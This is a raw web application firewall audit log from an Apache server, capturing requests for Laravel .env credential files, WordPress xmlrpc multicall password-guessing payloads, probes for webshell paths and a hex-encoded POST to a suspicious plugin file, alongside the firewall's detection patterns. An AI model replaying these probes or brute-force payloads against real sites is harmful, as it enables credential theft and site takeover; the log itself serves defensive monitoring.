[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/js/aainag/images/hotels-bharatpur.php||SC:/home/digitaltheka/public_html/abhaytravelsindia/aaina/images||"] [severity "DEBUG"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751280739646845 15523 (- - -) Stopwatch2: 1751280739646845 15523; combined=2989, p1=188, p2=2661, p3=0, p4=0, p5=139, sr=54, sw=1, l=0, gc=0 -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --ba80c55a-Z-- --abc60d01-A-- [30/Jun/2025:16:23:18.397335 +0530] aGJsnZcYrMYXFCPDIOKDYgAAAEE 192.253.209.82 2935 192.168.74.40 443 --abc60d01-B-- POST /.env HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept-Encoding: * Accept: */* Connection: keep-alive Content-Length: 13 Content-Type: application/x-www-form-urlencoded --abc60d01-C-- 0x%5B%5D=DTAB --abc60d01-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --abc60d01-H-- Message: Access denied with code 403 (phase 2). 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "227"] [id "77316757"] [msg "IM360 WAF: Laravel .env file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "CRITICAL"] [tag "service_im360"] Action: Intercepted (phase 2) Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751280797825678 572343 (- - -) Stopwatch2: 1751280797825678 572343; combined=1401, p1=119, p2=1034, p3=0, p4=0, p5=248, sr=58, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --abc60d01-Z-- --4c1e073a-A-- [30/Jun/2025:16:23:19.424753 +0530] aGJsn-g_3_MU1Jta0WaT_QAAACo 20.171.207.232 47454 192.168.74.40 443 --4c1e073a-B-- GET /aaina/images/rajasthan-tours-from-udaipur/images/https/https/aainag/js/js/privacy-policy.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --4c1e073a-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --4c1e073a-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/aainag/js/js/privacy-policy.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --e96f3d31-Z-- --ff03355c-A-- [30/Jun/2025:16:24:18.297504 +0530] aGJs2UKJU2jJ5HjzTb-IUAAAACc 192.253.209.59 12677 192.168.74.40 443 --ff03355c-B-- GET /.env.save HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept-Encoding: * Accept: */* Connection: keep-alive --ff03355c-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --ff03355c-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751280857724489 573510 (- - -) Stopwatch2: 1751280857724489 573510; combined=3394, p1=94, p2=3091, p3=0, p4=0, p5=208, sr=46, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --ff03355c-Z-- --2fd7ad02-A-- [30/Jun/2025:16:24:18.906068 +0530] aGJs2nP8dICYN5ByOwq_1gAAAE4 35.231.13.116 58460 192.168.74.40 80 --2fd7ad02-B-- POST /xmlrpc.php HTTP/1.1 Host: sridinterior.com Keep-Alive: 300 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml Content-Length: 491 --2fd7ad02-C-- <?xml version="1.0"?><methodCall><methodName>system.multicall</methodName><params><param><value><array><data> <value><struct><member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member><member><name>params</name><value><array><data><value><array><data><value><string>sridint1</string></value><value><string>admin@123</string></value></data></array></value></data></array></value></member></struct></value> </data></array></value></param></params></methodCall> --2fd7ad02-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Connection: close Content-Length: 401 Content-Type: text/xml; charset=UTF-8 --2fd7ad02-H-- -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --33a9fd18-Z-- --df6e3460-A-- [30/Jun/2025:16:24:19.838246 +0530] aGJs27w99McSIwt3IU_o-QAAABg 192.253.209.68 7669 192.168.74.40 443 --df6e3460-B-- POST /.env.save HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Accept-Encoding: * Accept: */* Connection: keep-alive Content-Length: 13 Content-Type: application/x-www-form-urlencoded --df6e3460-C-- 0x%5B%5D=DTAB --df6e3460-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --df6e3460-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751280859785783 52860 (- - -) Stopwatch2: 1751280859785783 52860; combined=8754, p1=113, p2=8253, p3=0, p4=0, p5=388, sr=46, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --df6e3460-Z-- --0ba67767-A-- [30/Jun/2025:16:24:19.968461 +0530] aGJs27aLDYq5_2IGGROL3AAAAD0 35.231.13.116 65202 192.168.74.40 80 --0ba67767-B-- POST /xmlrpc.php HTTP/1.1 Host: sridinterior.com Keep-Alive: 300 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml Content-Length: 490 --0ba67767-C-- <?xml version="1.0"?><methodCall><methodName>system.multicall</methodName><params><param><value><array><data> <value><struct><member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member><member><name>params</name><value><array><data><value><array><data><value><string>sridint1</string></value><value><string>password</string></value></data></array></value></data></array></value></member></struct></value> </data></array></value></param></params></methodCall> --0ba67767-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Connection: close -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --2fa4bc70-Z-- --ea461103-A-- [30/Jun/2025:16:25:19.501929 +0530] aGJtFnJgnyIVeL53SheiJAAAAEc 192.253.209.99 16747 192.168.74.40 443 --ea461103-B-- GET /.env.old HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0 Accept-Encoding: * Accept: */* Connection: keep-alive --ea461103-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --ea461103-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Message: Pattern match "\\.(asa|asax|ascx|backup|bak|bat|cdx|cer|cfg|cmd|com|config|conf|cs|csproj|csr|dat|db|dbf|dll|dos|htr|htw|ida|idc|idq|inc|ini|key|licx|lnk|log|mdb|old|pass|pdb|pol|printer|pwd|rdb|resources|resx|sql|swp|sys|vb|vbs|vbproj|vsdisco|webinfo|xsd|xsx)$" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/016_i360_monitor.conf"] [line "115"] [id "77350457"] [msg "IM360 WAF: Bad file extension||RSV:7.05||RS:0||T:APACHE||MVN:REQUEST_FILENAME||MV:/.env.old||User:adminsu||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751280918871091 631191 (- - -) Stopwatch2: 1751280918871091 631191; combined=3493, p1=87, p2=3255, p3=0, p4=0, p5=151, sr=49, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --ea461103-Z-- --d8484211-A-- [30/Jun/2025:16:25:19.924498 +0530] aGJtF35HkdacaMgZ4rsP6QAAAFI 172.70.54.157 47296 192.168.74.40 80 --d8484211-B-- GET /wp-admin/images/xmrlpc.php HTTP/1.1 Host: mondofusion.com X-Real-IP: 62.197.145.21 X-Remote-IP: 172.70.54.157 x-forwarded-for: 62.197.145.21 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3 cf-ray: 957d2174bdf2dabd-MIA Insecure-Flag: 1 accept-encoding: gzip cdn-loop: cloudflare; loops=1 cf-connecting-ip: 62.197.145.21 cf-ipcountry: US cf-visitor: {"scheme":"http"} X-Forwarded-Proto: http --d8484211-F-- HTTP/1.1 404 Not Found Content-Length: 315 Content-Type: text/html; charset=iso-8859-1 -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --e17da577-Z-- --078b8c4e-A-- [30/Jun/2025:16:25:20.775188 +0530] aGJtGPwVxPWQHjBdc98QzQAAACI 192.253.209.67 57869 192.168.74.40 443 --078b8c4e-B-- POST /.env.old HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept-Encoding: * Accept: */* Connection: keep-alive Content-Length: 13 Content-Type: application/x-www-form-urlencoded --078b8c4e-C-- 0x%5B%5D=DTAB --078b8c4e-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --078b8c4e-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Message: Pattern match "\\.(asa|asax|ascx|backup|bak|bat|cdx|cer|cfg|cmd|com|config|conf|cs|csproj|csr|dat|db|dbf|dll|dos|htr|htw|ida|idc|idq|inc|ini|key|licx|lnk|log|mdb|old|pass|pdb|pol|printer|pwd|rdb|resources|resx|sql|swp|sys|vb|vbs|vbproj|vsdisco|webinfo|xsd|xsx)$" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/016_i360_monitor.conf"] [line "115"] [id "77350457"] [msg "IM360 WAF: Bad file extension||RSV:7.05||RS:0||T:APACHE||MVN:REQUEST_FILENAME||MV:/.env.old||User:adminsu||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751280920710030 65749 (- - -) Stopwatch2: 1751280920710030 65749; combined=13257, p1=179, p2=12693, p3=0, p4=0, p5=385, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --078b8c4e-Z-- --38aa3b15-A-- [30/Jun/2025:16:25:21.248655 +0530] aGJtGesmfybBQBs2r_gaCAAAAFE 20.171.207.232 35988 192.168.74.40 443 --38aa3b15-B-- GET /aaina/images/rajasthan-tours-from-udaipur/images/https/https/aainag/images/js/luxury-mini-buses-coaches.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --38aa3b15-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --38aa3b15-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/aainag/images/js/luxury-mini-buses-coaches.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --38aa3b15-Z-- --860e5d3c-A-- [30/Jun/2025:16:25:21.892567 +0530] aGJtGZzhhZfKxw4cfpwMDgAAAAw 192.253.209.67 4293 192.168.74.40 443 --860e5d3c-B-- GET /.env.prod HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0 Accept-Encoding: * Accept: */* Connection: keep-alive --860e5d3c-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --860e5d3c-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751280921844415 48592 (- - -) Stopwatch2: 1751280921844415 48592; combined=4485, p1=110, p2=4224, p3=0, p4=0, p5=150, sr=65, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --860e5d3c-Z-- --7a967a18-A-- [30/Jun/2025:16:25:21.907739 +0530] aGJtGc0SQPrb5ANBj4JCzQAAADc 206.189.150.36 46316 192.168.74.40 443 --7a967a18-B-- POST /wp-content/plugins/elementor/assets/js/packages/editor/qtype_match.php HTTP/1.1 Host: sathrampalliativecare.com Accept: */* Sec-Fetch-Site: none Accept-Encoding: gzip,deflate Sec-Fetch-Mode: navigate user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.1.15 Accept-Language: eo;q=0.8,en-US;q=0.6,en;q=0.4 Sec-Fetch-Dest: document Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Content-Length: 122 Content-Type: application/x-www-form-urlencoded --7a967a18-C-- ent=3d3e716971217173686f752123744868496a466f6c7351756b537179436b544958232f237343467867406a724e4b485867624a56233a647968753a --7a967a18-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --af296375-Z-- --606acf0d-A-- [30/Jun/2025:16:27:24.190539 +0530] aGJtk0Qg396l8ScOSlFy2QAAAAc 192.253.209.58 25647 192.168.74.40 443 --606acf0d-B-- POST /.env.prod HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept-Encoding: * Accept: */* Connection: keep-alive Content-Length: 13 Content-Type: application/x-www-form-urlencoded --606acf0d-C-- 0x%5B%5D=DTAB --606acf0d-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --606acf0d-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281043609314 581551 (- - -) Stopwatch2: 1751281043609314 581551; combined=8635, p1=122, p2=8147, p3=0, p4=0, p5=366, sr=55, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --606acf0d-Z-- --84ec1a7d-A-- [30/Jun/2025:16:27:25.053907 +0530] aGJtlcMI--vd3cs0wwm1lQAAAAg 20.171.207.232 40964 192.168.74.40 443 --84ec1a7d-B-- GET /aaina/images/rajasthan-tours-from-udaipur/images/https/https/images/js/large.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --84ec1a7d-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --84ec1a7d-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/images/js/large.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/images/js/large.php||SC:/home/digitaltheka/public_html/abhaytravelsindia/aaina/images||"] [severity "DEBUG"] [tag "service_im360"] -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --84ec1a7d-Z-- --6035b535-A-- [30/Jun/2025:16:27:25.375425 +0530] aGJtlaJM_0FGIXuWxZGiAQAAABo 192.253.209.104 14447 192.168.74.40 443 --6035b535-B-- GET /.env.production HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0 Accept-Encoding: * Accept: */* Connection: keep-alive --6035b535-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --6035b535-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281045319422 56222 (- - -) Stopwatch2: 1751281045319422 56222; combined=3608, p1=108, p2=3330, p3=0, p4=0, p5=170, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --6035b535-Z-- --87098f7a-A-- [30/Jun/2025:16:27:25.773018 +0530] aGJtla26cFlwO3LDychZkQAAADg 172.70.54.157 49282 192.168.74.40 80 --87098f7a-B-- GET /.tmb/plugins.php HTTP/1.1 Host: mondofusion.com X-Real-IP: 62.197.145.21 X-Remote-IP: 172.70.54.157 x-forwarded-for: 62.197.145.21 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0 cf-ray: 957d24874d04dabd-MIA Insecure-Flag: 1 accept-encoding: gzip cdn-loop: cloudflare; loops=1 cf-connecting-ip: 62.197.145.21 cf-ipcountry: US cf-visitor: {"scheme":"http"} X-Forwarded-Proto: http --87098f7a-F-- HTTP/1.1 404 Not Found Content-Length: 315 Content-Type: text/html; charset=iso-8859-1 --87098f7a-H-- -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --4fbe953c-Z-- --9438e421-A-- [30/Jun/2025:16:28:25.874215 +0530] aGJt0SG8xpltoVrRBTVNDAAAAAY 192.253.209.70 61225 192.168.74.40 443 --9438e421-B-- POST /.env.production HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept-Encoding: * Accept: */* Connection: keep-alive Content-Length: 13 Content-Type: application/x-www-form-urlencoded --9438e421-C-- 0x%5B%5D=DTAB --9438e421-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --9438e421-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281105201344 673310 (- - -) Stopwatch2: 1751281105201344 673310; combined=9521, p1=133, p2=9002, p3=0, p4=0, p5=385, sr=65, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --9438e421-Z-- --61ac3713-A-- [30/Jun/2025:16:28:26.333997 +0530] aGJt0qbBThX8qGqBndJiqAAAADo 20.171.207.232 46854 192.168.74.40 443 --61ac3713-B-- GET /aaina/images/rajasthan-tours-from-udaipur/images/https/https/js/images/aainag/tnc.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --61ac3713-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --61ac3713-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/js/images/aainag/tnc.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/aaina/images/rajasthan-tours-from-udaipur/images/https/https/js/images/aainag/tnc.php||SC:/home/digitaltheka/public_html/abhaytravelsindia/aaina/images||"] [severity "DEBUG"] [tag "service_im360"] -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --61ac3713-Z-- --5efbf42d-A-- [30/Jun/2025:16:28:27.291366 +0530] aGJt03jeluSyCEHwIHd_KQAAADY 192.253.209.89 38089 192.168.74.40 443 --5efbf42d-B-- GET /.env.development%20 HTTP/1.1 Host: 103.185.74.40 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36 Accept-Encoding: * Accept: */* Connection: keep-alive --5efbf42d-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --5efbf42d-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751281107247139 44556 (- - -) Stopwatch2: 1751281107247139 44556; combined=4139, p1=106, p2=3870, p3=0, p4=0, p5=162, sr=53, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
